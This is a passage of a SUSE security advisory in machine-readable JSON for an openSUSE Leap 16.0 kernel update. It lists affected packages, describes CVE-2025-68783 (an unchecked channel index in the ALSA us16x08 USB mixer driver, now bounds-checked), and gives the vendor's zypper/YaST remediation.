"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68778"
},
{
"cve": "CVE-2025-68783",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68783"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-mixer: us16x08: validate meter packet indices\n\nget_meter_levels_from_urb() parses the 64-byte meter packets sent by\nthe device and fills the per-channel arrays meter_level[],\ncomp_level[] and master_level[] in struct snd_us16x08_meter_store.\n\nCurrently the function derives the channel index directly from the\nmeter packet (MUB2(meter_urb, s) - 1) and uses it to index those\narrays without validating the range. If the packet contains a\nnegative or out-of-range channel number, the driver may write past\nthe end of these arrays.\n\nIntroduce a local channel variable and validate it before updating the\narrays. We reject negative indices, limit meter_level[] and\ncomp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]\nupdates with ARRAY_SIZE(master_level).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68783",
"url": "https://www.suse.com/security/cve/CVE-2025-68783"
},
{
"category": "external",
"summary": "SUSE Bug 1256650 for CVE-2025-68783",
"url": "https://bugzilla.suse.com/1256650"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
